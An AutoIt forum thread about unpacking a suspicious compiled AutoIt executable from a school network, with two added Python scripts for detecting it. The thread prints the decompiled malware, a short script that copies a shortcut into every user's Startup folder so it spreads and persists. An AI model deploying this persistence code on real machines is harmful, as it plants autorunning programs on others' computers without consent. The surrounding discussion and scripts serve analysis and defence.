IAmABanana

Unpacking A Compiled Autoit .exe File?

19 posts in this topic

Hi,

I was wondering, is there a way to unpack a compiled AutoIt file?

I got infected with a weird AutoIt file somehow, and I guess it's a keylogger.

If that's the case, then his email address or FTP server address should be in it.

I saw it was compiled with a (probably modified) UPX.

The original file size was 118 KB, and I already unpacked it half to 336 KB, and I can see half of the functions, but still not enough to get much info about what it does.

So, is there a way to open that script and see its functions? Or is there an unpacker that unpacks it correctly?

Gr.




Hi,

AutoIt itself delivers an unpacker. But maybe the exe was secured with a password.

Give it a try. :)

So long,

Mega


Scripts & functions Organize Includes Let Scite organize the include files

Yahtzee The game "Yahtzee" (Kniffel, DiceLion)

LoginWrapper Secure scripts by adding a query (authentication)

_RunOnlyOnThis UDF Make sure that a script can only be executed on ... (Windows / HD / ...)

Internet-Café Server/Client Application Open CD, Start Browser, Lock remote client, etc.

MultipleFuncsWithOneHotkey Start different funcs by hitting one hotkey different times


Hmm, I tried that, and it says something like "this is not a compiled AutoIt script" or something like that.

But it has an AutoIt icon, it was named ai.exe, and it's packed the same.

On a forum I saw "This special exe2aut.exe will autofilling the passphrase and decompile every AutoIT_3.1-scriptfile".

But the link they gave to it is dead. Does anyone here have that?


#4 ·  Posted (edited)


Hi,

As far as I know, there is a decompiler, but it runs only with old autoit.exe files. So you won't get any further by getting the link.

So long,

Mega

Edited by th.meger


Hi,

I dumped the packer correctly now :)

According to the data, it's

Length Of Struc: 01B8h
Length Of Value: 0034h
Type Of Struc:   0000h
Info:           VS_VERSION_INFO
Signature:     FEEF04BDh
Struc Version:   1.0
File Version:   3.1.1.0
Product Version: 3.1.1.0
File Flags Mask: 0.23
File Flags:   
File OS:         WINDOWS32
File Type:     UNKNOWN
File SubType:   UNKNOWN
File Date:     00:00:00  00/00/0000

     Struc has Child(ren). Size: 348 bytes.

Child Type:      StringFileInfo
Language/Code Page: 2057/1200
Comments:          http://www.autoitscript.com/autoit3/compiled.html
FileDescription:    
FileVersion:        3, 1, 1, 0

Child Type:      VarFileInfo
Translation:        2057/1200

But I still can't really see what it does, because it's spoiled with all kinds of AutoIt functions, and I don't think it uses all of them.

Look: http://img443.imageshack.us/img443/8476/look5vj.gif

This makes it kind of hard to actually see what it does.

Any suggestions?


You're going about it the wrong way, so you know. You should just get the newest UPX (it's free) and unpack it directly. Then you'll have the source (assuming it's not password protected). Using a real-time debugger like the one you're using, the only hope that you have is that the info you're looking for (e-mail or web address) may be in the referenced text strings, but not likely, because of the way that the interpreter and source are just packaged together, and the code is not actually compiled in the typical sense.

1100111 00001011101111 00011101101111 00010111100100 00001111110100 00110111110010 00101101111001 0011100
I didn't make up this form of encryption, but I like it. Credit to the lvl 6 challenge on arcanum.co.nz

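The two static checks the thread has circled around so far, a UPX-packed binary and the Aut2Exe version-resource comment from the dump above, plus the strings pass cameronsdad suggests, as one small triage script. This is an added example, not a tool from the thread or from the AutoIt project. It assumes the UPX section names UPX0/UPX1/UPX2 (general knowledge of the packer, not stated in the thread) and feeds itself a constructed, minimal PE-shaped blob so it runs offline; a VS_VERSION_INFO block stores its strings as UTF-16, which is why the ASCII-only strings pass is paired with a UTF-16 one.

```python
"""Static triage of a suspected AutoIt-compiled executable (added example)."""
from __future__ import annotations

import re
import struct

# Indicators drawn from the thread: the comment URL Aut2Exe writes into the
# version resource of a compiled script, and the section names UPX leaves
# behind (the exact names are an assumption from general knowledge of UPX).
AUTOIT_COMMENT = "http://www.autoitscript.com/autoit3/compiled.html"
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
# What the original poster was hoping to find: mail, FTP/web addresses, shares.
INTERESTING = re.compile(r"@|ftp://|https?://|\\\\|\.lnk$", re.IGNORECASE)


def pe_section_names(data: bytes) -> list[str]:
    """DOS header -> PE signature -> COFF header -> section table; [] if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    coff = e_lfanew + 4                        # 20-byte COFF file header
    (n_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + opt_size               # section headers, 40 bytes each
    names = []
    for i in range(n_sections):
        off = table + i * 40
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def ascii_strings(data: bytes, min_len: int = 8) -> list[str]:
    """Printable ASCII runs, the classic 'strings' pass."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def utf16_strings(data: bytes, min_len: int = 8) -> list[str]:
    """UTF-16LE runs; version-resource text is stored this way, so an
    ASCII-only pass would miss the Aut2Exe comment."""
    return [m.group().decode("utf-16-le")
            for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)]


def triage(data: bytes) -> dict:
    """Static indicators for a suspected AutoIt-compiled binary."""
    sections = pe_section_names(data)
    strings = ascii_strings(data) + utf16_strings(data)
    return {
        "is_pe": bool(sections),
        "sections": sections,
        "upx_packed": any(s in UPX_SECTION_NAMES for s in sections),
        "autoit_marker": any(AUTOIT_COMMENT in s for s in strings),
        "interesting": [s for s in strings if INTERESTING.search(s)],
    }


def build_sample_pe() -> bytes:
    """Constructed sample: a minimal PE-shaped blob (not a runnable program)
    with UPX section names and an AutoIt-style version-resource comment."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt = b"\x0b\x01" + b"\0" * 222            # PE32 optional header, 224 bytes
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, len(opt), 0x102)
    sections = b"".join(n.ljust(8, b"\0") + b"\0" * 32
                        for n in (b"UPX0", b"UPX1", b".rsrc"))
    resource = AUTOIT_COMMENT.encode("utf-16-le")   # as VS_VERSION_INFO stores it
    strings = b"\0" * 4 + b"ftp://ftp.example.invalid/drop\0"  # constructed indicator
    return dos + b"PE\0\0" + coff + opt + sections + b"\0" * 16 + resource + b"\0\0" + strings


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Run it against a real sample by replacing `build_sample_pe()` with the file's bytes. A positive UPX result together with a negative AutoIt marker is the situation the thread hit: the version resource is inside the compressed section until the packer layer is removed, so the marker only shows up after unpacking.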

#8 ·  Posted (edited)

Post the script here and I'll make a dump of the script.

If it is hostile I will post it here.

OK, here it is.

Edit: @cameronsdad, UPX 2.00D is the newest; in fact, that can't unpack it. It says it's not packed with UPX or gives a 0000X0 error.

upx125w, though, can unpack it, but not to an AutoIt source, but to a C++ compiled .exe (according to PEiD).

autoit_thing.rar

Edited by IAmABanana


Bump, and solved.

OK, never mind, a friend sent me a modded unpacker that just gets the code from the file itself, and then unpacks it.

; <AUT2EXE VERSION: 3.1.1.0>

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------

FileChangeDir("C:\Documents and Settings")
; Shows the filenames of all files in the current directory
$search = FileFindFirstFile("*.*")

; Check if the search was successful
If $search = -1 Then
    MsgBox(0, "Error", "No files/directories matched the search pattern")
    Exit
EndIf

While 1
    $file = FileFindNextFile($search)
    If @error Then ExitLoop
    If $file = "." Then
        ; current-directory entry: nothing to do
    Else
        If $file = ".." Then
            ; parent-directory entry: nothing to do
        Else
            ; every other entry is treated as a user profile folder, and the
            ; shortcut from H: is copied into that profile's Startup folder
            ; (Dutch Windows name for "Start Menu\Programs\Startup");
            ; the trailing 1 tells FileCopy to overwrite an existing file
            FileCopy("H:\link2.lnk", "C:\Documents and Settings\" & $file & "\Menu Start\Programma's\Opstarten", 1)
        EndIf
    EndIf
WEnd

; Close the search handle
FileClose($search)

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------


#10 ·  Posted

OK... so it doesn't do anything.


#11 ·  Posted


Well, actually, yes it does.

C:\Documents and Settings\"&$file&"\Menu Start\Programma's\Opstarten

would get something like C:\Documents and Settings\{username}\Menu Start\Programma's\Opstarten

= startup folder

H:\link2.lnk is a shortcut to another virus-like file...


#12 ·  Posted

Aww, and I was just finished eating :)


My UDF's:;mem stuff_Mem;ftp stuff_FTP ( OLD );inet stuff_INetGetSource ( OLD )_INetGetImage _INetBrowse ( Collection )_EncodeUrl_NetStat_Google;random stuff_iPixelSearch_DiceRoll


#13 ·  Posted


What does that file do? The one that's linked to.


#14 ·  Posted

This doesn't really do much... unless the H: drive was plugged into your computer. This code is harmless.

You can't copy a .lnk file from H: if you don't have an H:... most computers don't. I am assuming someone had a small utility that they didn't expect someone was going to use.

If you have excluded some information then please feel free to show me, but the above code is harmless. It won't even run when in AutoIt without an H: drive.

Try harder next time,

JS


AutoIt Links

File-String Hash Plugin Updated! 04-02-2008 Plugins have been discontinued. I just found out.

ComputerGetInfo UDF's Updated! 11-23-2006

External Links

Vortex Revolutions Engineer / Inventor (Web, Desktop, and Mobile Applications, Hardware Gizmos, Consulting, and more)


That's how I saw it too, so I was looking for more info when he said that it ran 'another virus-like file'.


#16 ·  Posted


To me it's all hype... until he shows something more definite. Sure, it "could" link to a virus, IF indeed you had an H: drive it could copy that "bad" link from.

Too many variables to really be a virus-infected script. It was definitely not this script that caused issues. Unless of course someone knew he had a drive H:, and a shortcut on it with that name, and was able to also know that it went to something bad and just copied it to the startup folder of every available user.

Now again, that is VERY unlikely :)

JS



#17 ·  Posted


Well, because you care so much:

Our school network was infected with this, and some other crap files...

When you log in, your personal files go to h:\(documents and settings).

So this thing first copied itself from the startup folder to the startup folder of the user.

Then, if the user logs in somewhere else, the file gets called from h:\documents and settings\startup, and copies itself to the c:\ startup.

So if someone else logs in on that same computer, he also has it, and if he logs in somewhere else, that gets infected...

And all of a sudden the entire network has it...

What the .exe does that link2.lnk is linked to is not really important,

but now you see this thing was part of a virus code (a noobie-coded one, but still...)


#18 ·  Posted


Now you have extended us the courtesy which you should have passed along in the first place. What the EXE does in the .lnk is the virus, not this code. This code just ensures that the .exe will run no matter where you are.

Apparently it is someone in your school that knows a bit of AutoIt who created this script to copy that link to that EXE.

This file isn't an infection. If you have had any troubles it will be from the .EXE that the shortcut points to. After all, the final destination of this script is to make sure that runs!

Again I state: the above script that has been shown to us is in no way harmful. It may be a nuisance, but you should have precautions that would keep these things from happening.

If the EXE isn't anything bad then there is nothing malicious about this program.

JS


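Both sides of the argument above agree on one thing: whatever the shortcut's target does, this script's job is persistence, dropping the same .lnk into the Startup folder of every profile it can see, and the roaming H: drive carries it from machine to machine. That footprint is easy to sweep for. The following is an added example, not code from the thread: it walks a profiles root the way the decompiled script did, collects every shortcut in a per-user Startup folder, and flags names that appear in more than one profile. The Dutch Startup path comes from the thread; the English-locale path is an assumption, and the directory tree it scans is constructed in a temporary folder so it runs anywhere.

```python
"""Sweep per-user Startup folders for replicated shortcuts (added example)."""
from __future__ import annotations

import tempfile
from collections import defaultdict
from pathlib import Path

# Startup folder under a profile: the Dutch name seen on the infected machines
# in the thread, plus the English-locale equivalent (assumption).
STARTUP_SUBPATHS = (
    Path("Menu Start") / "Programma's" / "Opstarten",
    Path("Start Menu") / "Programs" / "Startup",
)


def startup_shortcuts(profiles_root: Path) -> dict[str, list[str]]:
    """Map each shortcut name found in a per-user Startup folder to the
    profiles that carry it. Profiles are taken from the directory listing,
    as the decompiled script did; Path.iterdir() never yields '.' or '..',
    so the script's two special cases need no counterpart here."""
    hits: dict[str, list[str]] = defaultdict(list)
    for profile in sorted(p for p in profiles_root.iterdir() if p.is_dir()):
        for sub in STARTUP_SUBPATHS:
            startup = profile / sub
            if not startup.is_dir():
                continue
            for entry in sorted(startup.iterdir()):
                if entry.is_file() and entry.suffix.lower() == ".lnk":
                    hits[entry.name].append(profile.name)
    return dict(hits)


def replicated(hits: dict[str, list[str]], min_profiles: int = 2) -> list[str]:
    """Shortcut names present in at least `min_profiles` profiles: the
    signature of something copied into every user's Startup folder."""
    return sorted(name for name, users in hits.items() if len(users) >= min_profiles)


def build_demo_tree(root: Path) -> Path:
    """Constructed sample: four profiles, two of which received link2.lnk."""
    profiles = root / "Documents and Settings"
    layout = (
        ("alice", STARTUP_SUBPATHS[0], ("link2.lnk",)),
        ("bob", STARTUP_SUBPATHS[0], ("link2.lnk", "notes.txt")),
        ("carol", STARTUP_SUBPATHS[1], ("OneNote.lnk",)),
        ("Default User", STARTUP_SUBPATHS[0], ()),
    )
    for user, sub, files in layout:
        folder = profiles / user / sub
        folder.mkdir(parents=True, exist_ok=True)
        for name in files:
            (folder / name).write_bytes(b"placeholder, not a real shortcut")
    return profiles


def demo() -> tuple[dict[str, list[str]], list[str]]:
    """Build the sample tree, sweep it, and return (all hits, replicated names)."""
    with tempfile.TemporaryDirectory() as tmp:
        profiles = build_demo_tree(Path(tmp))
        hits = startup_shortcuts(profiles)
        return hits, replicated(hits)


if __name__ == "__main__":
    found, suspicious = demo()
    for name, users in found.items():
        print(f"{name}: {', '.join(users)}")
    print("replicated across profiles:", suspicious)
```

On a real machine, point `startup_shortcuts` at the profiles root (`C:\Documents and Settings` on the systems in this thread) and at the roaming drive's copy of it as well, since the thread shows the H: copy is what reseeds each new computer; a shortcut that comes back after cleanup usually means the roaming copy was missed.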

#19 ·  Posted

C:\Documents and Settings\{username}\Menu Start\Programma's\Opstarten

Sounds Dutch to me...

You want me to stop by and teach them a lesson? (And that won't be in AutoIt3.) :)

Now the question in my mind is: how is it possible to create a shortcut to a virus that is always available to everybody in the school network and will automatically be run? That would require some sort of elevated access to a server, I assume.

Nice challenge, these school networks :(


Visit the SciTE4AutoIt3 Download page for the latest versions | Beta files | Forum Rules
 
Live for the present,
Dream of the future,
Learn from the past.
  :)
